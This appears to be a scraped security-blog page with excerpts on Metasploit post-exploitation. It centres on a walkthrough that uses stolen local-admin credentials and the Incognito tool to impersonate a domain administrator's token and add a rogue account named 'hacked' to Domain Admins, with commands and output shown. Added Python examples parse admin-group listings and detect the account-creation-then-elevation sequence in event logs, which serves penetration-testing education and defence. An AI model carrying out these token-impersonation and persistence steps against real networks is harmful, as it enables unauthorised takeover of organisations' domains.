Metasploit

Very worthwhile post at carnal0wnage by Tebo

Full article click here

Automatic credential collection and storage with CredCollect

Fans ? or Foes?

So I was doing a little vanity googling and came across something rather weird in the results:

Attack Research | Defense Is Dead
Valsmith decided to found this site after leaving Offensive Computing with a ... simple malware analysis into the larger world of total attack research. ...
www.cntradecity.com/ - 15k

Attack Research
Attack Research. Soon. | valsmith@metasploit.com |
www.cntradeshop.com/ - 1k

Attack Research
Attack Research. Soon. | valsmith@metasploit.com |

How to attack a windows domain

I recommend double clicking the video and watching it in full screen so it's somewhat legible. This video walks through an example of attacking a Windows domain. This post also contains a textual walkthrough.

V.

Get administrator rights on a workstation that is on a Windows domain using whatever method you can find (exploit, stolen password, smbrelay, phishing, etc.). Then look for the domain controller. There are a variety of ways to do this: you can run arp -a to find active IPs, or ping-scan the network and then use the nbtstat tool to look for the domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Acquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHAT\Domain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins:

C:\WINDOWS\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.
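The two listings above are the raw material for an access audit: the nested BLACKHAT\Domain Admins entry in the local Administrators group is what gives every domain admin rights on the workstation (and is why admin_valsmith's token turns up there later). The parser below, an added example and not code from the original post, reads the net.exe output as pasted above (constructed from the listings, not captured live) and expands the nested group so each principal with local admin rights is listed once.

```python
import re

# Constructed sample input: the two listings from the walkthrough above,
# pasted as captured text (not taken from a live host).
NET_LOCALGROUP_OUTPUT = """\
Alias name  administrators
Members
--------------------------------------
Administrator
BLACKHAT\\Domain Admins
hacked
local_valsmith
root
The command completed successfully.
"""
NET_GROUP_OUTPUT = """\
Group name   Domain Admins
Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.
"""

def parse_net_members(output):
    """Members listed after the dashed separator. net.exe prints them in
    space-padded columns (up to three per line), so rows split on 2+ spaces."""
    members, in_members = [], False
    for line in output.splitlines():
        if not in_members:
            in_members = line.startswith("---")
            continue
        if line.startswith("The command completed"):
            break
        members.extend(n for n in re.split(r"\s{2,}", line.strip()) if n)
    return members

def effective_local_admins(local_members, domain_admins, domain):
    """Expand a nested 'DOMAIN\\Domain Admins' entry into its individual
    accounts, so every principal with local admin rights is listed once."""
    nested = f"{domain}\\Domain Admins".casefold()
    effective = set()
    for member in local_members:
        if member.casefold() == nested:
            effective.update(f"{domain}\\{user}" for user in domain_admins)
        else:
            effective.add(member)
    return effective
```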

So admin_valsmith is our target domain admin. Let's say the workstation we hacked is at 172.16.1.10. We now need to find out if there are any security tokens we can access.

c:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[*] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPCLIENT\local_valsmith

Impersonation Tokens Available
==========================================
BLACKHAT\admin_valsmith
NT AUTHORITY\ANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. It connects to the IPC$ share on the target and lists any tokens that are available.

Next we will utilize this token to gain domain admin rights:


C:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhat\admin_valsmith" cmd

[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[+] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:\>net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the Domain Admins group. NOTE: often you don't want to add an account, especially one named "hacked", as it is likely to be discovered by the admins.


C:\>net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.
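The note above about the new account being "likely to be discovered by the admins" is what that discovery looks like from the domain controller's side. The detection below is an added example, not code from the original post: it runs over constructed records in the shape of Windows Security log events (event 4720 is a user account created, 4728 a member added to a security-enabled global group such as Domain Admins, 4732 a member added to a local group) and pairs an account creation with a privileged-group add of that same account shortly afterwards, the exact sequence the two net commands produce.

```python
from datetime import datetime, timedelta

# Constructed sample records in the shape of Windows Security log events
# (not captured from a real domain controller). Event 4720 = user account
# created; 4728 = member added to a security-enabled global group
# (Domain Admins is one); 4732 = member added to a local group.
SAMPLE_EVENTS = [
    {"time": "2008-11-10T14:02:11", "id": 4624,
     "subject": "BLACKHAT\\admin_valsmith", "target": "XPCLIENT$"},
    {"time": "2008-11-10T14:05:03", "id": 4720,
     "subject": "BLACKHAT\\admin_valsmith", "target": "hacked"},
    {"time": "2008-11-10T14:05:40", "id": 4728,
     "subject": "BLACKHAT\\admin_valsmith", "target": "hacked",
     "group": "Domain Admins"},
    {"time": "2008-11-11T09:00:00", "id": 4720,
     "subject": "BLACKHAT\\Administrator", "target": "svc_backup"},
]

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}


def privileged_group_adds(events):
    """Every addition to a privileged group: worth an alert on its own."""
    return [(e["subject"], e["target"], e["group"]) for e in events
            if e["id"] in (4728, 4732) and e.get("group") in PRIVILEGED_GROUPS]


def find_create_then_elevate(events, window=timedelta(hours=1)):
    """Pair a 4720 with a later privileged-group add of the same new account
    within `window`: the create-then-elevate sequence from the walkthrough."""
    created, hits = {}, []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4720:
            created[e["target"].casefold()] = t
        elif e["id"] in (4728, 4732) and e.get("group") in PRIVILEGED_GROUPS:
            key = e["target"].casefold()
            if key in created and t - created[key] <= window:
                hits.append((e["subject"], e["target"], e["group"]))
    return hits
```

The subject of both events is the impersonated admin_valsmith, not the local account the attacker started from, so the alert points at the account whose token was abused rather than at the workstation's local admin.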

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf

Making Life Easier With Metasploit Libraries

I was explaining some of this to a friend and figured I'd just post it...

If you have ever looked at an exploit module in Metasploit, most, if not all, will be calling additional libraries to actually "do" the work for the exploit; this is what makes MSF so great.

More on working with Incognito and Metasploit

Since a buddy asked for some clarification on using incognito extension with Metasploit/Meterpreter I'll post some more notes on it.

The background you need is here:
http://www.mwrinfosecurity.com/publications/mwri_security-implications-of-windows-access-tokens_2008-04-14.pdf

Using the Metasploit SMB Sniffer Module

There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I'll spare the links to protect the uninformed.

The SMB Relay module is for doing just what it says: relaying the SMB session back to another host. It used to be the same host, but now, post 08-068, you have to pick another system on the network. It doesn't matter which system, just not the same one. (I'll try to cover this in another blog post soon.)

Automatic credential collection and storage with CredCollect

In previous posts here at Carnal0wnage, CG has diligently covered using MSF and meterpreter to do all kinds of stuff, including grabbing hashes with the Priv extension (Vinnie Liu) and tokens with the Incognito extension (Luke Jennings). These are powerful post-exploitation features that yield invaluable information to the engagement team, so the presentation and accessibility of this data become an important factor as the scale of the engagement and the number of targets grow.

Presentation on Client-Side Attacks at SOURCE Boston

Alright, it's time for SOURCE Boston!

I'm happy to announce that g0ne and I will be there presenting on:

Attacking Layer 8: Client-Side Penetration Testing

We'll be talking about why you should be allowing your penetration testers to use client-side attacks during their assessments, how to use the Metasploit Framework to deliver client-side attacks with demos (yes, other tools do CS attacks but we're poor), and some remediations for client-side attacks.